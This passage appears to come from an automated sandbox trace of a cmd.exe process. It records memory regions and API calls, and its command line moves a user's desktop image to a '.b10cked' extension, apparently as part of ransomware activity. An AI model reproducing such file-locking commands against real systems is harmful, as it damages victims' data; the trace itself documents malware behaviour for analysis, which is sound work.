end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33612 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33613 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33614 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33615 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = 
"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33616 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33617 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33618 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33862 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33863 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33864 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33865 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 33866 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 33867 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33868 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33869 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = 
"lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33870 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33871 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33872 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33873 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33874 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33875 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33876 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 33877 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33878 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") 
Region: id = 33879 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33880 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 33881 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33882 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 33883 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 33884 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 33885 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 815 os_tid = 0x6fc [0225.486] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efae4 | out: lpSystemTimeAsFileTime=0x2efae4*(dwLowDateTime=0xb9f68aa0, dwHighDateTime=0x1d440a9)) [0225.486] GetCurrentProcessId () returned 0xeac [0225.486] GetCurrentThreadId () returned 0x6fc [0225.486] GetTickCount () returned 0x3e3f8 [0225.486] QueryPerformanceCounter (in: lpPerformanceCount=0x2efadc | out: lpPerformanceCount=0x2efadc*=28227553528) returned 1 [0225.487] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.487] __set_app_type (_Type=0x1) [0225.487] __p__fmode () returned 0x76b331f4 [0225.487] __p__commode () returned 0x76b331fc [0225.487] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.487] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, 
_Env=0x49e2423c) returned 0 [0225.488] GetCurrentThreadId () returned 0x6fc [0225.488] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6fc) returned 0x38 [0225.488] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.488] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.488] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.488] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa74 | out: phkResult=0x2efa74*=0x0) returned 0x2 [0225.488] VirtualQuery (in: lpAddress=0x2efaab, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.488] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.488] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.488] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.488] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efa44, dwLength=0x1c | out: lpBuffer=0x2efa44*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0225.488] GetConsoleOutputCP () returned 0x1b5 [0225.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.489] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.489] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.489] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.489] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.489] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.490] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.490] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.490] GetEnvironmentStringsW () returned 0xe0168* [0225.490] FreeEnvironmentStringsW (penv=0xe0168) returned 1 [0225.490] GetEnvironmentStringsW () returned 0xe0168* [0225.490] FreeEnvironmentStringsW (penv=0xe0168) returned 1 [0225.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee9e4 | out: phkResult=0x2ee9e4*=0x40) returned 0x0 [0225.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x90, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.490] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x1, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, 
lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x1, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x0, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x40, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x40, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x40, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegCloseKey (hKey=0x40) returned 0x0 [0225.491] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee9e4 | out: phkResult=0x2ee9e4*=0x40) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x40, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x1, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, 
lpData=0x2ee9f0*=0x1, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x0, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x9, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x4, lpData=0x2ee9f0*=0x9, lpcbData=0x2ee9e8*=0x4) returned 0x0 [0225.491] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9ec, lpData=0x2ee9f0, lpcbData=0x2ee9e8*=0x1000 | out: lpType=0x2ee9ec*=0x0, lpData=0x2ee9f0*=0x9, lpcbData=0x2ee9e8*=0x1000) returned 0x2 [0225.491] RegCloseKey (hKey=0x40) returned 0x0 [0225.491] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.491] srand (_Seed=0x5b8863b9) [0225.491] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"" [0225.491] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"" [0225.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.492] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.492] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.492] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.492] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.492] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.492] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.492] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.492] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.493] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.493] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.493] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.493] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.493] GetEnvironmentStringsW () returned 0xe22b8* [0225.493] FreeEnvironmentStringsW (penv=0xe22b8) returned 1 [0225.493] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.493] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.493] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.493] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.493] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.493] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.493] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.493] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.493] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.493] 
_wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef7b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.493] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef7b0, lpFilePart=0x2ef7ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef7ac*="Desktop") returned 0x18 [0225.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.494] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef52c | out: lpFindFileData=0x2ef52c) returned 0xdfff8 [0225.494] FindClose (in: hFindFile=0xdfff8 | out: hFindFile=0xdfff8) returned 1 [0225.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef52c | out: lpFindFileData=0x2ef52c) returned 0xdfff8 [0225.494] FindClose (in: hFindFile=0xdfff8 | out: hFindFile=0xdfff8) returned 1 [0225.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef52c | out: lpFindFileData=0x2ef52c) returned 0xdfff8 [0225.494] FindClose (in: hFindFile=0xdfff8 | out: hFindFile=0xdfff8) returned 1 [0225.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.494] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.495] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.495] GetEnvironmentStringsW () returned 0xe2ad8* [0225.495] FreeEnvironmentStringsW (penv=0xe2ad8) returned 1 [0225.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.495] GetConsoleOutputCP () returned 0x1b5 [0225.496] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.496] 
GetUserDefaultLCID () returned 0x409 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef8f0, cchData=128 | out: lpLCData="0") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef8f0, cchData=128 | out: lpLCData="0") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef8f0, cchData=128 | out: lpLCData="1") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.497] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.498] GetConsoleTitleW (in: lpConsoleTitle=0xd08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.498] 
GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.498] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.498] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.498] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.499] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.499] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.499] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.499] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.499] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.499] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.499] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.502] GetConsoleTitleW (in: lpConsoleTitle=0x2ef5e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.635] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.635] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.635] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.635] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.635] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.635] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.635] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.635] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.635] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.635] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.635] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.635] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.635] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.635] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.635] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.635] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0225.635] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.635] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.635] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.635] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.635] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.635] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.635] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.635] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.636] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.636] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.636] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.636] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.636] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.636] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.636] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.636] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.636] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.636] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.636] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.638] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.638] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef3a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef39c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef39c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.638] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.638] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.639] _wcsnicmp (_String1="COPYCMD", _String2="Program", 